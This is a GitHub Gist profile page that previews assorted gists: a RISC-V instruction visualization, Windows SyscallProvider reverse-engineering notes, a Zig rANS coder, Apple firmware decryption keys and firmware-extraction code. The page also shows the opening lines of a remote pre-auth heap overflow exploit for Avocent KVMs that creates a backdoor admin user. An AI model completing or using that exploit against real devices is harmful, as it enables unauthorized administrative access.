Skip to content

Instantly share code, notes, and snippets.

View SpiralBL0CK's full-sized avatar
👋

kn0 SpiralBL0CK

👋
200 followers · 1.5k following
View GitHub Profile
@SpiralBL0CK
SpiralBL0CK / README.md
Last active February 21, 2026 13:23 — forked from camel-cdr/README.md
Visualizing the RISC-V Instruction Set

Visualizing the RISC-V Instruction Set

Earlier today, I came across the blog post "Visualizing the ARM64 Instruction Set" and got inspired to give it a shot my self.

After hacking together a quick script and fiddling with the bit order and colors for way too long, I managed to create a decent visualization of the RISC-V instruction encoding. You can find my code below.

The following graphics cover the 64-bit part of the RISC-V ISA, including all ratified 64-bit extensions, with opcodes extracted from the riscv/riscv-opcodes repo.

I mapped the opcodes to 2D coordinates with a Morton space-filling curve.

@camel-cdr
camel-cdr / README.md
Created February 19, 2026 22:54
Visualizing the RISC-V Instruction Set

Visualizing the RISC-V Instruction Set

Earlier today, I came across the blog post "Visualizing the ARM64 Instruction Set" and got inspired to give it a shot my self.

After hacking together a quick script and fiddling with the bit order and colors for way too long, I managed to create a decent visualization of the RISC-V instruction encoding. You can find my code below.

The following graphics cover the 64-bit part of the RISC-V ISA, including all ratified 64-bit extensions, with opcodes extracted from the riscv/riscv-opcodes repo.

I mapped the opcodes to 2D coordinates with a Morton space-filling curve.

@Kristal-g
Kristal-g / SyscallProvider.md
Created May 12, 2025 09:02

Syscall Provider

Background

SyscallProvider is a feature available from Windows 11 22H2, that allows for inline hooking of syscalls.
This unfinished research was done on Windows 11 22H2. The feature is fully undocumented at the moment and it looks like it's locked to Microsoft-signed drivers.
All of the information here was gathered by manual reverse engineering of securekernel.exe, skci.dll and ntoskrnl.exe.
The kernel exports three functions to work with the new feature: PsRegisterSyscallProvider, PsQuerySyscallProviderInformation, PsUnregisterSyscallProvider.
This writeup will explore how this feature is initialized, how it works internally, and how to interact with it and use it.

@rand-tech
rand-tech / analyzing ifunc.md
Created April 4, 2024 05:19
@kprotty
kprotty / rANS.zig
Created February 9, 2024 17:52
const M = 12; // Probability scale for rANS state. Symbol frequencies in this log range. Usually 8-12.
const L = 23; // Renormalization factor to control dumping rANS state to bitstream. From rans_byte.h.
const m_min = 8 - 2 - (std.math.divCeil(u32, M, 4) catch unreachable); // Small-size-opt limit when compressing frequencies.
const m_max = [_]u16{m_min, m_min+16, m_min+16+256, m_min+16+256+4096, 1<<M}; // Size ranges for frequencies after small size limit.
fn compress(dst: anytype, src: []const u8) !void {
// Histogram for the frequency of each byte in input.
var hist = [_]u32{0} ** 256;
for (src) |byte| hist[byte] += 1;
@NyanSatan
NyanSatan / t8110-ap_keys-281023.json
Created January 13, 2024 16:47
T8110 AP & SEP keys 28.10.23
This file has been truncated, but you can view the full file.
[
{
"fw": "iPad_Fall_2021_15.0.1_19A348_Restore.ipsw",
"file": "LLB.j310.RELEASE.im4p",
"kbag": "C883D3D32C20E3108DF7BA1BB79F23E2BC848D034A968042E28615B85A490A26CDAA60A0F9F931C8C901AE1C7593C8BF",
"key": "793a284aff409d72860e64431e3d6a0e27f0d574ac4d4053628a7266ed5bd051eb6d06dde0acd5b9730ed874e136ed00"
},
{
"fw": "iPad_Fall_2021_15.0.1_19A348_Restore.ipsw",
"file": "iBEC.j310.RELEASE.im4p",
@x27
x27 / MainCpuFirmwareExtract.cs
Created January 3, 2024 02:29
Extract Main CPU firmware from ICOM IC-R8600 firmware bundle (1.01-1.35 USA and non-USA versions)
/// <summary>
/// Extract Main CPU firmware from ICOM IC-R8600 firmware bundle (1.01-1.35 USA and non-USA versions)
/// non-USA versions:
/// https://www.icomjapan.com/support/firmware_driver/?product=IC-R8600(EUR)&frm_type=Firmware&old=true
/// USA versions:
/// https://www.icomjapan.com/support/firmware_driver/?product=IC-R8600&frm_type=Firmware&old=true
/// </summary>
/// <param name="bundle">Firmware bundle</param>
/// <returns>Unpacked data</returns>
static byte[] MainCpuFirmwareExtract(byte[] bundle)
@aemmitt-ns
aemmitt-ns / asmpwn.py
Last active December 30, 2023 15:08
Remote pre-auth heap buffer overflow exploit for Avocent KVMs
import socket, struct, sys
p32 = lambda x: struct.pack(">I", x)
p16 = lambda x: struct.pack(">h", x)
p8 = lambda x: struct.pack(">b", x)
# ASMP heap overflow exploit creates new applianceAdmin user
def exploit(hostname, username="Backdoor", password="Backdoor"):
global socks # python closes out of scope sockets
port = 3211 # port is hardcoded in the binary
usernm = username.encode()
@matteyeux
matteyeux / decrypted.json
Created November 20, 2023 13:15
Apple Vision Pro firmware keys for VisionOS 1.0 beta 1-5
[
{
"url": "https://updates.cdn-apple.com/2023SummerSeed/patches/042-21091/60572AF0-9BC3-465F-89ED-77117194CB26/com_apple_MobileAsset_SoftwareUpdate/3df121022bd578846478faa25a4dcf3055396954.zip",
"build": "21N5207g",
"filename": "iBEC.n301.RELEASE.im4p",
"kbag": "AB7893B981E44BFF298328C89C826F8BA6EF1A7ADC80DB156C9D55D9F4E27E8AD2CC21AFA42A41E1392B57E9FE90D992",
"key": "34b218667cd03eb93e073b9b3bca4a865b20f130550a800b2aa2c1c2348041865cee47db7e3bcda739d05adde9f9f716"
},
{
"url": "https://updates.cdn-apple.com/2023SummerSeed/patches/042-21091/60572AF0-9BC3-465F-89ED-77117194CB26/com_apple_MobileAsset_SoftwareUpdate/3df121022bd578846478faa25a4dcf3055396954.zip",
@stevemk14ebr
stevemk14ebr / go_lib_typedefs.json
Last active October 13, 2023 19:15
Golang Standard Library Typedefs
This file has been truncated, but you can view the full file.
{
"archive_tar_headerError_Error": {
"result": "string",
"result_name": null,
"parameters": []
},
"archive_tar_sparseEntry_endOffset": {
"result": "int64",
"result_name": null,
"parameters": []